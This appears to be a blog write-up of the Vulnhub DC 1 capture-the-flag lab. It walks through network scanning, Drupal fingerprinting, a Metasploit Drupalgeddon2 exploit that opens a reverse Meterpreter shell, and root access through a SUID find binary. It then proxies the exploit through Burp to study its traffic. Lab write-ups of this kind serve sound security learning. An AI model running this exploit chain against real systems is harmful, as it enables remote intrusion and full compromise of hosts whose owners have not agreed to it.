Vulnhub - DC 1

Posted on | In
My writeup on DC 1 box.

Box Stats

Box Info Details
Box Name : DC 1
Series : DC
Difficulty : Easy
Release Date : 28 Feb 2019
OS : GNU/Linux
Maker : DCAU
Download : DC 1
Recommended : Yes :heavy_check_mark:

Summary

Hello all, i’ve been away from CTFing all this period so i decided to warmup a bit with an old box. DC series is pure gold! It’s all about exploiting a vulnerable drupal version and the privesc is a simple SUID binary exploitation. Let’s pwn it!

PoC

Target IP

Always first step is to find target IP address, i prefer to use the arp-scan utility. Then we’ll save the IP address in a variable.

1
2
3
 
$ arp-scan --localnet | grep "VMware"
192.168.1.12	00:0c:29:ec:7a:1d	VMware, Inc.
$ ip=192.168.1.12

Enumeration/Reconnaissance

Now as always let’s continue with a nmap scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
 
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-19 14:57 EET
Nmap scan report for dc-1.zte.com.cn (192.168.1.12)
Host is up (0.00087s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
34753/tcp open  unknown
MAC Address: 00:0C:29:EC:7A:1D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds

$ nmap -p 22,80,111,34753 -sC -sV -oN nmap/dc1.vulnhub $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-19 14:58 EET
Nmap scan report for dc-1.zte.com.cn (192.168.1.12)
Host is up (0.00045s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33353/udp6  status
|   100024  1          33393/tcp6  status
|   100024  1          34753/tcp   status
|_  100024  1          48282/udp   status
34753/tcp open  status  1 (RPC #100024)

Obviously, we have to deal with web exploitation. Once we visit the website we can see that is running drupal, to double check that we can use an awesome tool called whatweb:

1
2
 
$ whatweb http://$ip/ | tee scans/whatweb.txt
http://192.168.1.12/ [200 OK] Apache[2.2.22], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], IP[192.168.1.12], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PHP[5.4.45-0+deb7u14], PasswordField[pass], Script[text/javascript], Title[Welcome to Drupal Site | Drupal Site], UncommonHeaders[x-generator], X-Powered-By[PHP/5.4.45-0+deb7u14]

Googling around for a drupal vulnerability scanner, i found out this tool droopescan. You can simply install it using this command: pip install droopescan. Let’s fire it up(takes some time).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
 
$ droopescan scan drupal -u http://$ip/ | tee scans/droopescan.txt
[+] Themes found:                                                               
    seven http://192.168.1.12/themes/seven/
    garland http://192.168.1.12/themes/garland/

[+] Possible interesting urls found:
    Default admin - http://192.168.1.12/user/login

[+] Possible version(s):
    7.22
    7.23
    7.24
    7.25
    7.26

[+] Plugins found:
    ctools http://192.168.1.12/sites/all/modules/ctools/
        http://192.168.1.12/sites/all/modules/ctools/LICENSE.txt
        http://192.168.1.12/sites/all/modules/ctools/API.txt
    views http://192.168.1.12/sites/all/modules/views/
        http://192.168.1.12/sites/all/modules/views/README.txt
        http://192.168.1.12/sites/all/modules/views/LICENSE.txt
    profile http://192.168.1.12/modules/profile/
    php http://192.168.1.12/modules/php/
    image http://192.168.1.12/modules/image/

[+] Scan finished (0:08:47.567985 elapsed)

droopescan tell us an interesting thing that drupal version is 7.x. So we’ll continue by searching possible exploits on 7.x version using searchsploit.

Shell as www-data

1
2
3
4
5
6
7
8
9
10
11
12
 
$ searchsploit drupal 7
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                  |  Path
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
...data...
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                                                        | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                                                     | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                                             | php/webapps/44449.rb
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                                             | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                                                         | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                                                         | php/remote/44482.rb
...data...

Bingo! We’ve a RCE exploit the famous Drupalgeddon. I’ll use the MSF way for faster.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
 
$ service postgresql start; msfconsole -q
msf6 > search name:Drupalgeddon type:exploit

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_drupalgeddon2  2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/drupal_drupalgeddon2

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.1.12
RHOSTS => 192.168.1.12
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 192.168.1.20:4444
[*] Sending stage (39282 bytes) to 192.168.1.12
[*] Meterpreter session 1 opened (192.168.1.20:4444 -> 192.168.1.12:54395) at 2020-12-19 16:02:07 +0200

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : DC-1
OS          : Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686
Meterpreter : php/linux
meterpreter > shell
Process 3381 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@DC-1:/var/www$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@DC-1:/var/www$

Shell as root

Privilege escalation is root is simple, we just have to search for SUID binaries & exploit find.

1
2
3
4
5
6
7
 
www-data@DC-1:/var/www$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;                     
-rwsr-xr-x 1 root root 88744 Dec 10  2012 /bin/mount
-rwsr-xr-x 1 root root 31104 Apr 13  2011 /bin/ping
-rwsr-xr-x 1 root root 35200 Feb 27  2017 /bin/su
-rwsr-xr-x 1 root root 35252 Apr 13  2011 /bin/ping6
..data..
-rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find

1
2
3
4
 
www-data@DC-1:/var/www$ find . -exec /bin/sh \; -quit
# whoami;id
root
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

Reading the flag(s)

1
2
3
4
5
6
7
 
# cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

Analyze metasploit module using burp suite

For beginners burp suite is a web penetration testing framework, burp suite works as a proxy. We route the traffic through the burp suite proxy server.

A proxy server acts as a gateway between you and the internet. When we send a HTTP request, your request goes to the proxy server first. The proxy server then sends your HTTP request to the server, collects the response from the web server, and forwards you the web page.

To understand what metasploit does in the background, we’ll set a proxy.

I made a diagram with photoshop, so you will understand what we’re doing now.

First let’s terminate our current session.

1
2
3
4
5
6
 
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > sessions -k 1
[*] Killing the following session(s): 1
[*] Killing session 1
[*] 192.168.1.12 - Meterpreter session 1 closed.

Now we’ll check the advanced options of the module & set the proxy.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show advanced options
...data...
Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.1.12     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host

1
2
3
4
5
6
7
 
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set ReverseAllowProxy true
ReverseAllowProxy => true
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 192.168.1.20:4444

You can analyze now what metasploit is doing step by step:

Thank You

Thank you for taking the time to read my writeup. If you don’t understand something from the writeup or want to ask me something feel free to contact me through discord(0xatom#8707) or send me a message through twitter 0xatom

Until next time keep pwning hard! :fire: